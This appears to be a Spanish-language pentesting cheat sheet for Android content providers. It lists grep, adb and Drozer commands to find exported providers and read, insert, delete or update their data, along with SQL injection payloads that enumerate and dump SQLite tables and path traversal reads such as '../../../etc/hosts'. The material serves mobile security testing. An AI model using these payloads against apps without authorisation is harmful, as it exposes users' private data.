Content providers
Búsqueda de content providers con exportación habilitada
# AndroidManifest.xml
## explÃcitamente
grep "<provider" app-decompiled/AndroidManifest.xml | grep "android:exported=\"true\""
## implÃcitamente
grep "<intent-filter" -B 1 app-decompiled/AndroidManifest.xml | grep "<provider" | grep --invert-match "android:exported=\"true\""
# Drozer
run app.provider.info -a <app-package-name>Obtener URIs de content providers
# Drozer
run app.provider.finduri <app-package-name>
run scanner.provider.finduris -a <app-package-name>Interacción general con content providers
Android Debug Bridge (adb)
# General
adb shell content <command> --uri <uri> <parameters>
# Select
adb shell content query --uri <uri>
adb shell content query --uri <uri> --projection <column-name>
adb shell content query --uri <uri> --where <column-name>=<column-value>
adb shell content query --uri <uri> --where "<column-name>=\'<column-value>\'"
# Insert
adb shell content insert --uri <uri> --bind <column-name>:<column-type>:<column-value>
# Delete
adb shell content delete --uri <uri>
adb shell content delete --uri <uri> --where <column-name>=<column-value>
# Update
adb shell content update --uri <uri> --bind <column-name>:<column-type>:<column-value> --where <column-name>=<column-value>
# Lectura de archivo
adb shell content read --uri <uri>/<file>
# Descarga de archivo
adb shell content read --uri <uri>/<file> > <file>Drozer
# Select
run app.provider.query <uri>
run app.provider.query <uri> --projection <column-name>
run app.provider.query <uri> --selection <column-name>=<column-value>
run app.provider.query <uri> --selection <column-name>=\'<column-value>\'
# Insert
run app.provider.insert <uri> --<column-type> <column-name> <column-value>
run app.provider.insert <uri> --string <column-name> <column-value> --integer <column-name> <column-value>
# Delete
run app.provider.delete <uri>
run app.provider.delete <uri> --selection <column-name>=<column-value>
run app.provider.delete <uri> --selection <column-name>=\'<column-value>\'
# Update
run app.provider.update <uri> --selection <column-name>=<column-value> --<column-type> <column-name> <column-value>
# Lectura de archivo
run app.provider.read <uri>/<file>
# Descarga de archivo
run app.provider.download <uri>/<file> .SQL injection (SQLi)
Identificación de SQLi.
# Android Debug Bridge (adb)
adb shell content query --uri <uri> --projection "\'"
# Drozer
run scanner.provider.injection -a <app-package-name>
run app.provider.query <uri> --projection "'"
run app.provider.query <uri> --selection "'"Enumeración de tablas.
# Android Debug Bridge (adb)
adb shell content query --uri <uri> --projection "*\ FROM\ SQLITE_MASTER\ WHERE\ type=\'table\'\;--"
# Drozer
run scanner.provider.sqltables -a <app-package-name>
run app.provider.query <uri> --projection "* FROM SQLITE_MASTER WHERE type='table';--"Obtención de datos de una tabla.
# Android Debug Bridge (adb)
adb shell content query --uri <uri> --projection "*\ FROM\ <table>\;--"
# Drozer
run app.provider.query <uri> --projection "* FROM <table>;--"Path traversal
Identificación de path traversal.
# Drozer
run scanner.provider.traversal -a <app-package-name>Lectura de archivo.
# Android Debug Bridge (adb)
adb shell content read --uri <uri>/<file>
adb shell content read --uri <uri>/../../../<file>
adb shell content read --uri <uri>/../../../etc/hosts
# Drozer
run app.provider.read <uri>/<file>
run app.provider.read <uri>/../../../<file>
run app.provider.read <uri>/../../../etc/hostsÚltima actualización
¿Te fue útil?